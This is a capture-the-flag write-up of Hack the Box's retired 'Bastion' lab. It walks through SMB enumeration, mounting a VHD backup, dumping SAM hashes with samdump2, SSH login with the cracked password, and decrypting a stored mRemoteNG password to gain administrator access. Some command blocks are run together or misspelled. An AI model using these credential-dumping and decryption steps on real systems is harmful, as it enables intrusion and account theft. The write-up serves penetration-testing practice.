Today we are going to solve another CTF challenge called “Bastion” which is categorized as a retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
Task: find user.txt and root.txt file on the victim’s machine.
Penetration Testing Methodology
- Network Scanning
- Open Port & Services (Nmap)
- Connecting to SMB
- Enumerating SMB
- Mounting Backups
- Getting SAM file
- Cracking SAM file contents
- Getting User Flag
- Privilege Escalation
- Enumerating mRemoteNG
- Cracking mRemoteNG encrypted password
- Capture Root Flag
Since these labs are online, therefore they have static IP. The IP of Baiston is 10.10.10.134 so let’s start with nmap port enumeration.
From the given image below, we can observe that we found ports 22, 135, 139, 445 are open. This means the services like ssh, MSRP, smb etc are running in the victim’s network.
|1||nmap -A 10.10.10.134|
As we can clearly note form the nmap scan that we have the SMB service running, and we don’t have any credentials for the ssh so we went directly on SMB. We logged in using the command mentioned. There is a list of shared directories. We tried a bunch of them but only Backups seems to be accessible. We enumerated that directory. We find a notes.txt, a temp file, and a directory named WindowsImageBackup. Let’s transfer the notes.txt file on our machine to read its contents.
|1234||smbclient -L //10.10.10.134smbclient //10.10.10.134/Backupssmb: \> lssmb: \> get note.txt|
After transferring the file, we went back on our kali shell and read the file using the cat command.
It contained the message that might be a hint. Let’s keep it in mind and enumerate further.
“Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.”
We went back to the smb, in order to look at the directory we found earlier. It contained another directory with the name of the system, L4mpje, we went into that directory as well to find a Backup directory. Here we found some vhd images. On close inspection, we found that these are system backup files.
|1234567||smbclient //10.10.10.134/Backupssmb: \> cd WindowslmageBackupsmb: \WindowslmageBackup\> lssmb: \WindowslmageBackup\> cd L4mpje-PCsmb: WindowsImageBackup\L4mpje-PC\> lssmb: \WindowslmageBackup\L4mpje-PC\> cd “Backup 2019-02-22 124351″smb: \WindowslmageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls|
The note said that trying to download them will take a very long time, we decided that mounting them is the way to go. To do this we are going to create these directories as shown in the image.
|12||mkdir /mnt/L4mpje-PCmkdir /mnt/vhd|
Now for the mounting of those backups, we are going to use the CIFS protocol followed by the path of the backup folder, with an anonymous user.
|1||mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous|
Now using the qemu-nbd we will mount the specific vhd backup file. After mounting we went into the vhd directory to see the files that the backup contained.
|1234||qemu-nbd -r -c /dev/nbd0 “/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-al7c-806e6f6e6963.vhd”mount -r /dev/nbdOpl /mnt/vhdcd /mnt/vhdls -la|
We enumerated around for a while and finally, we went into the System32 directory to find a config directory. Here we found the SAM and the SYSTEM file.
|12||cd Windows/System32/configls -la|
Now we have to extract the credentials from these two files. To do that we are going to use samdump script. After running, we got the following hashes. Two of these users are disabled.
|1||samdump2 ./SYSTEM ./SAM|
We cracked the hash online to find the password for the user L4mpje to be bureaulampje.
Now we will login into the lab using the ssh while using the username l4mpje and the password bureaulampje. After logging in we traversed to the Desktop of the user to read the user.txt flag
|1234||ssh firstname.lastname@example.org@BASTION C:\Users\L4mpje>cd Desktopl4mpje@BASTION C:\Users\L4mpje\Desktop>dirl4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt|
Now it’s time to escalate privileges on the lab. We enumerated the user directory to look into the AppData directory. Here inside the Roaming directory, we saw that mRemoteNG is installed on the machine. We got some XML files inside it. We tried to open them using the type command to find an encoded password.
|123||l4mpje@BASTION C:\Users\L4mpje>cd AppData\Roaming\mRemoteNGl4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dirl4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml|
Now, we headed to Google to find any way to decrypt this encoded text, we found this mRemoteNG-Decrypt script for decrypting our password. We cloned the git to our system and ran the python script with the encoded text as a parameter. The password came out to be:
|123||git clone https://github.com/haseebT/mRemoteNG-Decrypt.gitcd mRemoteNG-Decrypt/python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHFOuS17QTdT9kVqtKCPeoCONw5dmaPFjNO2kt/z05xDgE4HdVmHAowVRdC7emf7lWWAlOdOKiw==|
Now we will get the ssh as administrator user with our decoded password.
Now let’s enumerate the final flag. We found the root flag on the Desktop.
|123||administrator@BASTION C:\Users\Administrator>cd Desktopadministrator@BASTION C:\Users\Administrator\Desktop>dir administrator@BASTION C:\Users\Administrator\Desktop>type root.txt|